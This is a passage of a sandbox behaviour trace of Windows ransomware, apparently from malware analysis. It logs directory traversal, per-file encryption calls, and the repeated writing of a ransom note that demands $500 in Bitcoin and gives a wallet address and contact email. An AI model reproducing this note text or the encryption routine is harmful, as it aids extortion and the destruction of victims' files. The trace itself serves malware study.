Files") returned -1 [0065.511] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.511] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.511] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.511] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\..") returned 38 [0065.511] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.511] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.511] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="Windows") returned -1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="Program Files") returned -1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="Program Files (x86)") returned -1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="$Recycle.bin") returned 1 [0065.511] lstrcmpiW (lpString1="DSS", lpString2="System Volume Information") returned -1 [0065.511] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS") returned 39 [0065.511] lstrcmpW (lpString1="DSS", lpString2=".") returned 1 [0065.511] lstrcmpW (lpString1="DSS", lpString2="..") returned 1 [0065.511] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*") returned 41 [0065.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.511] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.511] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.511] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.511] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.511] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.511] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\.") returned 41 [0065.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.512] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.512] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.512] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.512] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.512] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.512] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.512] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\..") returned 42 [0065.512] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.512] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.512] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0065.512] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0065.512] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 51 [0065.512] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0065.512] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0065.512] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*") returned 53 [0065.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.512] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.512] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.512] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.512] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.512] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.512] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\.") returned 53 [0065.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.512] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.513] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.513] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.514] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.514] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.514] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.514] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\..") returned 54 [0065.514] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.514] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.514] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.514] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.514] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt") returned 69 [0065.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.515] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.515] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.516] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.516] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.516] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.516] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.516] CloseHandle (hObject=0xd4) returned 1 [0065.516] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.516] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.516] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt") returned 57 [0065.516] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.516] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.516] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.517] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.517] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.517] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.517] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0065.517] CloseHandle (hObject=0xb4) returned 1 [0065.517] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.517] lstrcmpiW (lpString1="Keys", lpString2="Windows") returned -1 [0065.517] lstrcmpiW (lpString1="Keys", lpString2="Program Files") returned -1 [0065.517] lstrcmpiW (lpString1="Keys", lpString2="Program Files (x86)") returned -1 [0065.518] lstrcmpiW (lpString1="Keys", lpString2="$Recycle.bin") returned 1 [0065.518] lstrcmpiW (lpString1="Keys", lpString2="System Volume Information") returned -1 [0065.519] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned 40 [0065.519] lstrcmpW (lpString1="Keys", lpString2=".") returned 1 [0065.519] lstrcmpW (lpString1="Keys", lpString2="..") returned 1 [0065.519] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*") returned 42 [0065.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.519] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.519] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.519] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.519] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\.") returned 42 [0065.520] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.520] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0065.520] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0065.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0065.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0065.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\." (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.520] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.520] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.520] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.520] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.520] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.520] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\..") returned 43 [0065.520] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.520] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.520] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0065.520] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0065.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0065.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0065.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\.." (normalized: "c:\\programdata\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.520] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.520] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt") returned 58 [0065.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.521] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.521] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.523] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.523] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.523] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.523] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0065.523] CloseHandle (hObject=0xb4) returned 1 [0065.523] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0065.523] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0065.523] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned 39 [0065.523] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0065.523] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0065.523] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*") returned 41 [0065.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.524] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.524] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\.") returned 41 [0065.524] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.524] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.524] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.524] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.524] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.524] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.524] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\..") returned 42 [0065.524] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.524] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.524] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0065.524] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0065.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 51 [0065.524] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0065.524] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0065.524] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned 53 [0065.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.524] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.524] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.525] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\.") returned 53 [0065.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.525] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.525] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.525] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 